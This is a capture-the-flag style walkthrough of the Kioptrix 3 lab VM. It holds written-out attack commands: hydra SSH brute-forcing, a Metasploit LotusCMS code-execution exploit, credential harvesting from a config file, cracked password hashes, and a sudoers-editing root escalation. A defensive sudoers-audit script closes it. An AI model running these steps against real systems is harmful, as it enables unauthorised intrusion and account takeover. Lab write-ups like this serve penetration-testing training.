Kioptrix Level 1.2 3

Vulnhub virtual machine. On the path to OSCP, this box offered web-application testing with Metasploit, phpMyAdmin credential enumeration, cracking hashes with Hashcat and an interesting priv-esc that involved modifying the sudoers file.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Enumeration

netdiscover -r 192.168.56.0/24

Target: 192.168.56.105

Nmap Scanning

nmap -sV -sC -oA nmap/kio3 192.168.56.105

Navigating to the HTTP server on port 80

Searchsploit for the web application

searchsploit lingoat

Nothing of note turned up.

Checking out the source of the web application

It looks to be PHP-based, with pages loaded via index.php?page=index.

We have a username, loneferret, who was mentioned in a post in the blog section. Move on to trying to brute-force SSH with that username.

Hydra Bruteforcing SSH

hydra -e nsr -l loneferret -P /usr/share/wordlists/rockyou.txt 192.168.56.105 ssh -t 4

Important: use *-t 4* so as not to overload the SSH server and risk some passwords not being tested.

Brute forcing inside a VM is… well, terrible.

Login page

searchsploit LotusCMS

searchsploit LotusCMS

Interesting find.

Viewing how the Metasploit vulnerability works

The exploit works by manipulating the page parameter of the default page; that will be worth investigating.

Remote Code Execution

Run Metasploit and search for lotuscms

msfdb run

This will start PostgreSQL and the required services before launching the console.

We have achieved an easy shell.

getuid shows the current user; sysinfo shows system information.

Capture /etc/passwd

cat /etc/passwd

The username loneferret exists, as confirmation.

Search for any type of config files

search -d /home/www/kioptrix3.com -f *config*

Investigating config files

cat /home/www/kioptrix3.com/gallery/gconfig.php

phpMyAdmin user/password discovered!

Log in to phpMyAdmin: navigate to kioptrix3.com/phpmyadmin

Access granted.

Navigating through the MySQL server to the gallery database, we discover dev_accounts.

Hashes captured

dreg: 0d3eccfb887aabd50f243b3f155c0f85
loneferret: 5badcaf789d3d1d09794d8f021f40f0e

Determining type of hash

hash-identifier

MD5 looks like a possible match.

Cracking Hashes with Hashcat: add the hashes to hash.txt

Launch Hashcat

hashcat -m 0 -a 0 hash.txt rockyou.txt -o cracked.txt

Hashes successfully cracked.

dreg       - 0d3eccfb887aabd50f243b3f155c0f85: starwars
loneferret - 5badcaf789d3d1d09794d8f021f40f0e: Mast3r

Connect to SSH

Perform a quick sudo -l to determine what we can su-DO. (Joke complimentary.)

Priv-Esc

Execute sudo ht

sudo ht

Played around until discovering that *ALT+f* is the key combination to move around in the application.

Modifying the sudoers file

Add /bin/sh to loneferret's entry and save the file.

Root

sudo /bin/sh

Bring me the root!
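The root cause of this priv-esc is a sudo rule that lets a user run an editor as root, which is the same as granting root outright. As an added defender-side example (not from the original post), the script below audits sudoers-style rules and flags any entry that grants an editor or shell; the sample sudoers content is constructed to mirror the loneferret/ht situation and is an assumption, not the box's actual file.

```python
import re

# Constructed sample sudoers content modelled on the scenario above (a user
# allowed to run the ht editor as root); it is not the box's real file.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
%admin ALL=(ALL) ALL
"""

# Programs that can write arbitrary files or spawn a shell once they run as
# root; a sudo rule granting one of them is equivalent to granting root.
ROOT_EQUIVALENT = {"ht", "vi", "vim", "nano", "less", "more", "sh", "bash"}

# user  host=(runas) [TAG:] cmd, [TAG:] cmd ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^([A-Z]+):\s*")


def audit_sudoers(text):
    """Return (user, command, nopasswd) for every rule that is root-equivalent."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = False  # tags persist across the comma-separated command list
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            while (tag := TAG_RE.match(cmd)):
                if tag.group(1) == "NOPASSWD":
                    nopasswd = True
                elif tag.group(1) == "PASSWD":
                    nopasswd = False
                cmd = cmd[tag.end():]
            if cmd.startswith("!"):
                continue  # a negated entry grants nothing
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in ROOT_EQUIVALENT:
                findings.append((m.group("user"), cmd, nopasswd))
    return findings
```

Running audit_sudoers(SAMPLE_SUDOERS) flags loneferret's ht entry as a passwordless root-equivalent grant; the fix is to remove the editor from the rule and, if a specific file must be editable, use sudoedit on that file instead.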

-exec